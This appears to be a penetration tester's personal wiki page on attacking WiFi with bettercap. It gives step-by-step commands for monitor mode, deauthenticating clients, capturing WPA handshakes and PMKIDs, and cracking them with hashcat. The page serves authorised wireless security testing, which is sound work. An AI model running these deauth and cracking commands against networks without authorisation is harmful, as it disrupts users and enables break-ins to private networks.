Skip to main content

bettercap

Notes: totally underconstruction while I review bettercap's CLI and see what's still relevant.

Connect USB wifi to ESXi/Proxmox

In ESXI, shut down the host, then add a new USB device and choose "Realtek 802.11n NIC"

Kill processes on the Kali VM that might screw stuff up:

airmon-ng check kill

Start monitoring on the wifi card

sudo airmon-ng start wlan0

Start bettercap

sudo docker run -it --privileged --net=host bettercap/bettercap -iface wlan0

Set wifi capture file (warning: if you don't set this now and want to change it, you have to RESTART the wifi recon function)

set wifi.handshakes.file /root/captures.pcap

Set wifi.deauth acquired to true (optional)

What I found during testing is that I would capture a lot of "half" handshakes but never the full ones. After reading this Github [issue] (https://github.com/bettercap/bettercap/issues/889) I tried setting "set wifi.deauth.acquired true" and then I started getting full handshakes!

set wifi.deauth.acquired true

Get wifi recon going!

wifi.recon on

Sort networks by # of clients connected

set wifi.show.sort clients desc

Every second, clear out our view and then present an updated list of nearby WiFi networks:

set ticker.commands 'clear; wifi.show'

Filter out client probes

events.ignore wifi.client.probe

Filter out client disconnections

events.ignore wifi.client.lost

Filter out new APs that come online

events.ignore wifi.ap.new

Filter out new clients that come online

events.ignore wifi.client.new

Filter out lost connections with APs

events.ignore wifi.ap.lost

Show networks that ONLY start with 7MS:

set wifi.show.filter ^7MS

Turn on ticker

ticker on

Set channel to the one you're attacking

wifi.recon.channel X

Disassociate all clients on a given BSSID to capture handshakes!

wifi.deauth 11:22:33:44:55:66

Assoc with target SSID to do the PKMID attack

wifi.assoc all

-or-

wifi.assoc 11:22:33:44:55:66

Clear SSID filter

set wifi.show.filter ^

Clear wifi.recon.channel filter

wifi.recon.channel clear

Figure out the container ID for bettercap

sudo docker ps

Copy files from docker to hard drive

First, make note of the ID (noted with "XXX" below). If you didn't change the default path, you should be able to see captured files in the /root folder. Try listing them with:

sudo docker exec XXX ls /root/

Now you can copy them out of the docker and into your current folder:

sudo docker cp XXX:/root/captures.pcap .

Convert .pcap files to hccapx files

sudo /usr/lib/hashcat-utils/cap2hccapx.bin wifi-handshakes.pcap wifi-handshakes-converted.hccapx

Crack w/hashcat!

sudo /path/to/hashcat -m2500 converted-file.hccapx wordlist.txt

If this doesn't work ^^^, it looks like the new standard hash type might be m22000 per this article. In that case, here's what I did on the pcap itself to get it ready for hashcat:

sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap

One time I had problems with my .cap file from bettercap and had to do this to clean it up:

tshark -r my-cap-file-from-bettercap.cap -R "(wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02 || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x05 || wlan.fc.type_subtype == 0x08 || eapol)" -2 -F pcapng -w stripped.pcapng

Then convert from .pcapng to .pcap

editcap -F pcap stripped.pcapng stripped.pcap
Tags:
Last updated on by wb